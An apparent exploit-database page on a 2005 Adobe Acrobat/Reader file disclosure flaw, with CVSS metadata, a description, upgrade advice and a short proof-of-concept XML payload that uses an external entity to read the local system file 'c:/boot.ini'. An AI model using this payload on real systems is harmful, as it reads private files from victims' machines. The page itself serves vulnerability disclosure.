header-logo
Suggest Exploit
vendor:
Acrobat Reader
by:
SecurityFocus
7.5
CVSS
HIGH
File Disclosure Vulnerability
200
CWE
Product Name: Acrobat Reader
Affected Version From: Adobe Acrobat and Adobe Reader 5.0.5
Affected Version To: Adobe Acrobat and Adobe Reader 7.0.7
Patch Exists: YES
Related CWE: N/A
CPE: a:adobe:acrobat_reader
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Adobe Acrobat and Adobe Reader File Disclosure Vulnerability

Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well. Information gathered through the exploitation of this vulnerability may aid in other attacks.

Mitigation:

Adobe has released an update to address this issue. Users are advised to upgrade to the latest version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13962/info

Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well.

Information gathered through the exploitation of this vulnerability may aid in other attacks. 

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>

Navigation

Suggest Exploit

Services By CQR